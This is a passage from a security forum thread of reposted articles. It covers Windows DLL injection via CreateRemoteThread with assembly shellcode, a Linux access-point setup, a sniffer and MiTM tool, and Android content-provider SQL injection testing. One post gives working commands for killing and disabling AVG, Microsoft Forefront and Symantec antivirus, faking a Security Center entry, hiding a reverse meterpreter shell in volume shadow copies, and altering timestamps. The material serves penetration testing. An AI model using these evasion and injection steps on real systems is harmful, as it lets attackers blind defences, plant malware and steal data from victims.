this (due to the fact that "CreateProcess" is rather a macro then function name, we should explicitly specify A version as some compilers tend to default to W versions): CreateProcessA(nameOfTheFile, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInformation); Don't forget to set the cb field of startupInfo to (DWORD)sizeof(STARTUPINFO), otherwise it would not work. If the function succeeds, we get all the information about the process (handles and IDs) in the processInformation structure, which has the following prototype: typedef struct _PROCESS_INFORMATION { HANDLE hProcess; //Handle to the process HANDLE hThread; //Handle to the main thread of the process DWORD dwProcessId; //ID of the new process DWORD dwThreadId; //ID of the main thread of the process }PROCESS_INFORMATION, *LPPROCESS_INFORMATION; By now, the process has been created, but it is suspended. Meaning that it has not started its execution yet and will not until we call ResumeThread(processInformation.dwThreadId) telling the operating system to resume the main thread of the process, but this is going to be the last action performed by our loader. Lancet One may call it a shellcode, but it has nothing to do with the viral payload or any other malicious intent (unless, someone would say that breaking into address space of another process is malicious by definition). It is the code, that we are going to inject into the target process. It, theoretically, may be written in any language as long as it may be position independent and compiled into native instructions (in our case x86 instructions), but I prefer to do such things in Assembly language. It is always a good idea, to think of what your code is intended to do before writing a single line of it, in this case it is a golden idea. The code needs to be small, preferably fast and stable as it is a bit of a headache to debug once it has been injected. There are two basic tasks that you would want to assign to this code: * Load our DLL * Call the initialization procedure exported by our dLL and one unavoidable condition - it has to be a function declared as ThreadProc callback, due to the fact that we are going to use the CreateRemoteThread function in order to launch it. The prototype of a ThreadProc callback function looks like this: DWORD WINAPI ThreadProc( __in LPVOID lpParameter); which means that it has to return a value of type DWORD (which is actually unsigned int). It accepts one parameter, which may either be an actual value (but you have to cast it to LPVOID type) or a pointer to an array of parameters. One more thing about this function (the last but not the least!) it is an stdcall function - WINAPI macro is defined as __declspec(stdcall). This means that our function has to take care of cleaning the stack before return. In our case it is quite easy, simply use ret 0x04 (assuming that size of LPVOID is 4 bytes). Another important thing to mention - you will, obviously need to know how many bytes your function occupies in order to correctly allocate memory in the address space of the target process and move your code there. In addition to allocation of one block of executable memory for our function, you will also need to allocate one block for data - configuration settings to be passed to the injected DLL. It is easy to pass the address of the parameters as an argument to our ThreadProc. The skeleton of the function would look like this: lancet: push ebp mov ebp, esp sub esp, as_much_space_as_you_need_for_variables push registers_you_are_planning_to_use ;function body pop registers_you_used mov esp, ebp pop ebp ret 0x04 lancet_size = $-lancet The last line gives us the exact size of the function in bytes. The following is the source file template: format MS COFF ;as we are going to link this file with our loader public lancet as '_lancet' section '.text' readable executable lancet: ;our function goes here ;followed by data loadLibraryA db 'LoadLibraryA',0 init db 'name_of_the_initialization_function',0 ourDll db 'name_of_our_dll',0 kernel32 db 'kernel32.dll',0 lancet_size = $-lancet public lsize as '_lancet_size' section '.data' readable writeable lsize dd lancet_size So, what are we going to insert into the "function body"? First of all, as our code, once it is injected, has no idea of where in the memory it is, we should save our "base address" and calculate all the offsets relative to that address. This is done in a simple manner. We call the next address and pop the return address into our local variable. call @f @@: pop dword [ebp-4] sub dword [ebp-4], @b-lancet that's it. Now the variable at [ebp-4] contains our "base address". Each time we want to call another function or access our data (strings with names, remember?) we should do the following: mov ebx, [ebp-4] add ebx, ourDll-lancet push ebx mov ebx, [ebp-8] ;assume that we stored the address of LoadLibraryA at [ebp-8] call dword ebx The code above is an equivalent of LoadLibraryA("name_of_our_dll") . Now about the execution itself. Although, we now know where we are, we have no idea of what the address of LoadLibraryA is. There are, at least, two ways to get that address nicely. First has been described in my "Stealth Import of Windows API" article. The second is also interesting - PEB. Yes, we are going to access the Process Environment Block, find the LDR_MODULE structure which refers to KERNEL32.DLL and get its base address (which is also a handle to the library). Some may say that this way is not reliable, not stable and even dangerous, but I will say, that statements like these are not serious. We are not going to change anything in those structures. We are only going to parse them. How do we find the PEB? This is quite simple. It is located at [FS:0x30]. Once we have it, we are on our way to PEB_LDR_DATA address, which is at PEB+0x0C. In order to parse the PEB_LDR_DATA structure, we should declare the following in our Assembly code: struc list_entry { .flink dd ? ;pointer to next list_entry structure .blink dd ? ;pointer to previous list_entry structure } struc peb_ldr_data { .length dd ? .initialized db ? db ? db ? db ? .ssHandle dd ? .inLoadOrderModuleList list_entry ;we are going to use this list .inMemoryOrderModuleList list_entry .inInitializationOrderModuleList list_entry } struc ldr_module { .inLoadOrderModuleList list_entry ;pointers to previous and next modules in list .inMemoryOrderModuleList list_entry .inInitializationOrderModuleList list_entry .baseAddress dd ? ;This is what we need! .entryPoint dd ? .sizeOfImage dd ? .fullDllName unicode_string ;full path to the module file .baseDllName unicode_string ;name of the module file .flags dd ? .loadCount dw ? .tlsIndex dw ? .hashTable list_entry .timeDateStamp dd ? } I leave the implementation of the module list parsing function up to you. You just have to keep in mind that the string you are going to check are represented by the UNICODE_STRING structure (described in the article referenced above). Another thing to remember, is that it is better to implement case insensitive string comparison function. Once you find the LDR_MODULE wich baseDllName is "kernel32.dll" you have its handle (simply in the baseAddress field). You may use the _get_proc_address function from the same article (mentioned above) in order to get the address of the LoadLibraryA function. Having that address, you are ready to load your DLL (do the actual injection). Personal suggestion - do not put lots of code into the DllMain function. LoadLibraryA returns a handle to the newly loaded DLL, which you can use in order to locate you initialization function (remember it has to be exported by your DLL and preferably use the stdcall convention). After you _get_proc_address of your initialization function, call it and pass the address of the data block as a parameter (it was passed to our lancet function as a parameter on stack): push dword [ebp+8] ;parameter passed to lancet is here call dword [ebp-12] ;assume that you stored the address of the initialization ;function here That's it. Your code may now return. The DLL has been injected and initialized. Injection somehow, we have missed the exciting process of injection of our lancet code. Don't worry, I have not forgotten about it. As I have mentioned above, we have to allocate two blocks - for code and data. This can be done by calling the VirtualAllocEx function, which allows memory allocations in the address space of another process. LPVOID WINAPI VirtualAllocEx( __in HANDLE hProcess, __in_opt LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flAllocationType, __in DWORD flProtect ); Use MEM_COMMIT as flAllocationType and PAGE_EXECUTE_READWRITE and PAGE_READWRITE for allocation of code and data block respectively. This function returns the address of allocated block in the address space of the specified process or NULL. The WriteProcessMemory API function is used to copy your code and data into the address space of the target process. BOOL WINAPI WriteProcessMemory( __in HANDLE hProcess, __in LPVOID lpBaseAddress, __in LPCVOID lpBuffer, __in SIZE_T nSize, __out SIZE_T*lpNumberOfBytesWritten ); Once you have copied both the data and the code, you will want to call your thread function. The only way to call a function which resides in the memory of another process is by calling the CreateRemoteThread API. HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess, //the handle to our process __in LPSECURITY_ATTRIBUTES lpThreadAttributes, //may be NULL __in SIZE_T dwStackSize, //may be 0 __in LPTHREAD_START_ROUTINE, //the address of our code block __in LPVOID lpParameter, //the address of our data block __in DWORD dwCreationFlags, //may be 0 __out LPDWORD lpThreadId //may be NULL ); This function returns a handle to the remote thread, which, in turn, may be passed to the WaiForSingleObject API function, so that we can get notification on its return. I decided not to cover the possibilities of what your DLL can do while attached to the target process and leave this completely up to you. I hope this article was not too muddled and, may be, even helpful. Have fun coding and see you at the next post. Sursa
  21. co4ie
    sa setezi wlan0 ca AP: iwconfig wlan0 mode Master -->> SAU "Master" iwconfig wlan0 channel 6 iwconfig wlan0 essid Retea -->> SAU "Retea" iwconfig wlan0 key 11111111 (64 bit encryption) -->> SAU iwconfig wlan0 key open (fara pass) echo 1 > /proc/sys/net/ipv4/ip_forward (Din cate stiu eu) Normal linux iti routeaza direct intre echipamentele de retea... deci de route ai nevoie doar ca sa iti arate ca routeaza ... route -FC ifconfig nu inteleg la ce ai putea sa il folosesti... decat sa iti listeze echipamentele de retea si sa le dai up/down...sa nu zica ca nu le folosesti !! ifconfig wlan0 down ifconfig wlan0 up ifconfig eth0 down ifconfig eth0 up LE: sau mai poti face un bridge asa: brctl addbr br0 ifconfig wlan0 0.0.0.0 brctl addif br0 wlan0 ifconfig br0 192.168.1.115 netmask 255.255.255.0 up route add -net 192.168.1.0 netmask 255.255.255.0 br0 route add default gw 192.168.1.1 br0 Sau sa setezi dnsmask ca DHCP pe LAN-ul nou : WAN=eth0 LAN=wlan0 LANIP="192.168.133.1" DHCPRANGE="192.168.133.2,192.168.133.253" # setup forwarding and the dnsmasq service fwd() { iptables -A FORWARD -i $LAN -j ACCEPT iptables -A FORWARD -o $LAN -j ACCEPT iptables -t nat -A POSTROUTING -o $WAN -j MASQUERADE echo 1 > /proc/sys/net/ipv4/ip_forward ifconfig $LAN $LANIP/24 up /usr/sbin/dnsmasq -C /dev/null >/dev/null 2>&1 \ --bind-interfaces \ --listen-address=$LANIP \ --dhcp-range=$DHCPRANGE,12h \ echo "to disable: $0 -d WAN=$WAN LAN=$LAN" } # remove forwarding and the dnsmasq service unfwd() { pkill -9 dnsmasq ifconfig $LAN down echo 0 > /proc/sys/net/ipv4/ip_forward iptables -D FORWARD -i $LAN -j ACCEPT iptables -D FORWARD -o $LAN -j ACCEPT iptables -t nat -D POSTROUTING -o $WAN -j MASQUERADE } Off: @Pugna ... Termina cu posturile aiurea... ai 95 de posturi deja (din care nici unul nu e cu si/sau despre ceva interesant) si abia te-ai inregistrat luna asta ... WTF?? Lasa post hunting-ul ca nu se accepta !!Si btw ... niciodata nu o sa fii destul de documentat daca esti Troll !!
  22. co4ie
    When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system. The A/V guys will also pick up on common service executable files such as being used with Metasploit’s bypassuac. Let’s face it, we still need to write stuff into temp directories from time to time. Mark Baggett, and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (Tim Tomes and Mark Baggett Lurking in the Shadows Hack3rcon II (Hacking Illustrated Series InfoSec Tutorial Videos)). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, then we would likely want to follow this sequence of tasks during a test: a) Disable the A/V product of choice. Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar) c) Upload Mark and Tim’s excellent vssown.vbs script a. Enable service and create volume shadow copy. b. Disable volume shadow copy service. d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy. e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’. The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. Otherwise said, Windows security center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes. 1. Grisoft’s AVG Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable. DISABLING: a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows. C:\> cd %systemroot%\program files\avg\avg2012 C:\> move avgcsrva.exe avgcsrva_.exe C:\> move avgemca.exe avgemca_.exe C:\> move avgnsa.exe avgnsa_.exe C:\> move avgrsa.exe avgrsa_.exe b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command. C:\> wmic process where “name like ‘avg[cenr]%.exe’” delete c. The watchdog service will to restart all of the binaries but fail. ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest. 2. Microsoft Forefront The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively. DISABLING: kill the GUI tool and stop the A/V engine service. C:\> wmic process where name=”msseces.exe” delete C:\> sc stop msmpsvc ENABLING: start the A/V service engine, and start the GUI process. C:\> cd \Program Files\Microsoft Security Client C:\> sc start msmpsvc C:\> msseces.exe 3. Symantec Endpoint Protection The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe. DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact. C:\> wmic process where “name like ‘%smc%.exe’” delete C:\> sc stop smcservice C:\> sc stop “Symantec AntiVirus” ENABLING: restarting just the smcservice will start everything else back up again. C:\> sc start smcservice To prevent the security center from complaining about your crashed AV, just register a second one via wmic: wmic /namespace:\\root\securitycenter PATH AntiVirusProduct CREATE displayName=DummyAV,onAccessScanningEnabled=TRUE,productUptoDate=TRUE Once you are finished testing, you can delete it again: wmic /namespace:\\root\securitycenter PATH AntiVirusProduct WHERE displayname='DummyAV' DELETE Sursa
      • 1
      • Upvote
  23. co4ie
    Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple's coding signing requirements, which allowed him to run arbitrary code on the iPhone. Sursa
  24. co4ie
    Intercepter-NG is a new and improved sniffing tool with many added features. It supports several sniffing modes. For instance, in raw mode, it acts like a pure sniffer with appearance similar to Wireshark, providing enough functionality to perform a quick research of the network traffic. In the eXtreme mode Intercepter-NG will analyze all TCP packets without checking ports. So, even if any application uses undefined port, the sniffer will check those packets anyway. It also provides a remote traffic capturing mode, which allows you to transfer network data from one host to another via the libpcap RPCAP protocol. Intercepter-NG can also act as a Stealth DHCPD, allowing you to use it as a simple DHCP server for DHCP MiTM attacks. In the NAT mode, it translates ICMPUDPTCP packets from Ethernet to Ethernet, and from Ethernet to PPPoE areas. Long outgoing packets (up to MTU size) are fragmented and MSS tracking is performed. Features of Intercepter-NG: Sniffing passwordshashes of the types:ICQ, IRC, AIM, FTP, IMAP, POP3, SMTP, LDAP, BNC, SOCKS, HTTP, WWW, NNTP, CVS, TELNET, MRA, DC++, VNC, MYSQL, ORACLE Sniffing chat messages of ICQ, AIM, JABBER, YAHOO, MSN, IRC, MRA Promiscuous-mode ARP, DHCP, Gateway, Smart Scanning Raw mode (with pcap filter) eXtreme mode Capturing packets and post-capture (offline) analyzing Remote traffic capturing via RPCAP daemon NAT ARP MiTM DNS over ICMP MiTM DHCP MiTM SSL MiTM + SSL Strip Operating systems supported: Microsoft Windows 2K,XP,2k3,Vista,7 Video tutorial on Intercepter-NG Download Intercepter-NG: Intercepter-NG.v09.zip Scuze... Nu prea folosesc search-ul ..
  25. co4ie
    Today we are releasing WebContentResolver, an Android assessment tool which allows you to find Content-Provider vulnerabilities in no time. A Content-Provider is one of Androids IPC endpoints; it is commonly used to implement data storage in applications and to offer access to this data to other applications on the device. The Android browser bookmarks or Android contacts list are just two examples for Content-Providers implemented on every Android. Unfortunately these Content-Providers are often riddled with vulnerabilities which allow third party applications or compromised applications to gain access to sensitive data. Regularly we find vulnerabilities, such as directory traversal or SQL injection in providers installed as part of the Android system or by third party applications. As these issues are similar to issues that are commonly found in web applications it would be desirable to test Content-Providers in the same way web applications are tested. This will allow us to leverage the current skill set of web application tester and the currently available tool set for web application testing. This is exactly what WebContentResolver does. This blog post will walk you through an example on how to use WebContentResolver. For this example we use the new Google Galaxy Nexus phone with Android 4.0. We start by installing the WebContentResolver.apk to the phone or emulator which we like to test. This will create an icon in the Launcher menu, which we start now. This will start at a local web server listening on port 8080. We can forward this port to a desktop computer using the following command (For this USB debugging needs to be enabled): ./adb forward tcp:8080 tcp:8080 Once this is done we can access the web server from our desktop using the following URL: http://localhost:8080/ This will give us a very brief overview of the implemented methods. First of all we are interested in what content providers are available. We achieve this by browsing to http://localhost:8080/list . The overview we get includes the providers, names and permissions in the following format: package: com.android.providers.drm authority: drm exported: true readPerm: null writePerm: null --------------------------------------------- package: com.android.providers.media authority: media exported: true readPerm: null writePerm: null --------------------------------------------- package: com.android.providers.settings authority: settings exported: true readPerm: null writePerm: android.permission.WRITE_SETTINGS --------------------------------------------- package: com.android.providers.telephony authority: telephony exported: true readPerm: null writePerm: null We can now move on to query one of the providers. In our example we choose the settings provider. Pointing the browser at http://localhost:8080/query?a=settings&path0=system will give us the content of the settings table in the Settings provider. Going to http://localhost:8080/query will give us a brief overview of the functionality of the query method. Going to http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5 will show us a single row in the table: Query successful: Column count: 3 Row count: 1 | _id | name | value | 5 | volume_alarm | 6 And http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5 will demonstrate the first vulnerability: Exception: android.database.sqlite.SQLiteException: unrecognized token: "')": , while compiling: SELECT * FROM system WHERE (_id=5') unrecognized token: "')": , while compiling: SELECT * FROM system WHERE (_id=5') You can now choose to use your favourite web app testing tool, such as sqlmap to assess the provider further and to exploit the vulnerability. Disclaimer: The use of tools like WebContentResolver will never replace proper audits and reviews of applications. Sursa
×
×
  • Create New...